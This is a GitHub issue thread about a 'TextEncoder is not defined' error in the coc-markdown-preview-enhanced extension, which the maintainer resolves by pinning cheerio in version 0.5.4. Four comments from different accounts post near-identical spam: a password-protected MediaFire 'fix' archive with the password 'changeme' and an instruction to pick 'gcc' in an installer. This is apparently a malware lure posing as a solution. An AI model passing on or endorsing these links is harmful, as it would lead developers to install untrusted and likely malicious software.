### ISSUE TITLE
Error on active extension coc-markdown-preview-enhanced: ReferenceError: TextEncoder is not defined

### ISSUE THREAD

**Issue by hexh250786313** [weirongxu/coc-markdown-preview-enhanced#31]
I recently reinstalled coc-markdown-preview-enhanced, but it seems that some hidden dependency was upgraded to cause an error

```
2024-08-26T11:37:47.630 ERROR (pid:5848) [extensions-manager] - Error on active extension coc-markdown-preview-enhanced: ReferenceError: TextEncoder is not defined
    at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/data-url.js:5:17)
    at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
    at Module.load (node:internal/modules/cjs/loader:1208:32)
    at Module._load (node:internal/modules/cjs/loader:1024:12)
    at Module.require (node:internal/modules/cjs/loader:1233:19)
    at req (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78072:17)
    at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/util.js:7:97)
    at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
2024-08-26T11:37:47.635 ERROR (pid:5848) [server] - unhandledRejection  Promise {
  <rejected> ReferenceError: TextEncoder is not defined
      at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/data-url.js:5:17)
      at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
      at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
      at Module.load (node:internal/modules/cjs/loader:1208:32)
      at Module._load (node:internal/modules/cjs/loader:1024:12)
      at Module.require (node:internal/modules/cjs/loader:1233:19)
      at req (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78072:17)
      at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/util.js:7:97)
      at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
      at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
} ReferenceError: TextEncoder is not defined
    at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/data-url.js:5:17)
    at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
    at Module.load (node:internal/modules/cjs/loader:1208:32)
    at Module._load (node:internal/modules/cjs/loader:1024:12)
    at Module.require (node:internal/modules/cjs/loader:1233:19)
    at req (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78072:17)
    at Object.<anonymous> (/home/hexh/.config/coc/extensions/node_modules/coc-markdown-preview-enhanced/node_modules/undici/lib/web/fetch/util.js:7:97)
    at Module._compile (/home/hexh/.local/share/nvim/site/pack/packer/opt/coc.nvim/build/index.js:78088:28)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hexh250786313** [comment]
I would suggest using the bundle model, where all dependencies are packaged into a single `index.js`, to prevent some dependency packages from upgrading their internal dependencies on their own (even locking the version doesn't work well, as there is no way to lock the version of the package that his internal dependencies are using)

**Comment by weirongxu** [comment]
Due to the complexity of @shd101wyy/mume, it cannot be bundled directly with esbuild.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by weirongxu** [comment]
A temporary solution was released in 0.5.4 that uses overrides to fix the version of cheerio.

**Comment by hexh250786313** [comment]
It looks like the issue is fixed. But since it's using a temporary solution, should I close it?

**Comment by weirongxu** [comment]
Yes, feel free to close this issue now. When I have more free time, I'll see if I can upgrade to `crossnote` replace `mume`, just like the vscode extension does.
